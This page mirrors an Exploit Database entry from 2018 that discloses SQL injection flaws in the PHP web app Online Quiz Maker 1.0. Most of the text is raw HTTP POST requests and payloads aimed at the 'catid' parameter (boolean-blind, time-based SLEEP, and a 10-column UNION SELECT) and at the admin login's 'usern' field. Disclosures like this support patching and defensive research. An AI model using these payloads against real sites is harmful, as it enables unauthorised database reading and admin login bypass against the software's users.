Online Quiz Maker 1.0 – ‘catid’ SQL Injection

• Exploit Database
• 116 阅读

• 作者： AkkuS
  日期： 2018-09-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45323/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78

  # Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection # Dork: N/A # Date: 2018-09-03 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) # Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php # Software Link:https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip # Version: 1.0 # Category: Webapps # Tested on: Kali linux   # Description : An attacker can execute SQL commands through parameters # that contain vulnerable. # An authorized user can use the filtering feature and can fully authorize # the database or other server informations. Also there are XSS # vulnerabilities too.   # PoC : SQLi 1 : # Request(POST):   POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 18 uname=test&catid=1   # Parameter: catid (POST) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload:   uname=test&catid=1 AND 4815=4815   # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload:   uname=test&catid=1 AND SLEEP(5)   # Type: UNION query # Title: Generic UNION query (NULL) - 10 columns # Payload:   uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR   # PoC : SQLi 2: Admin Login SQL Injection # Request(POST):   POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://server/admin/add-category.php Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 38 usern=testing&passw=password&type=auth   # Parameter: usern (POST) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload:   usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth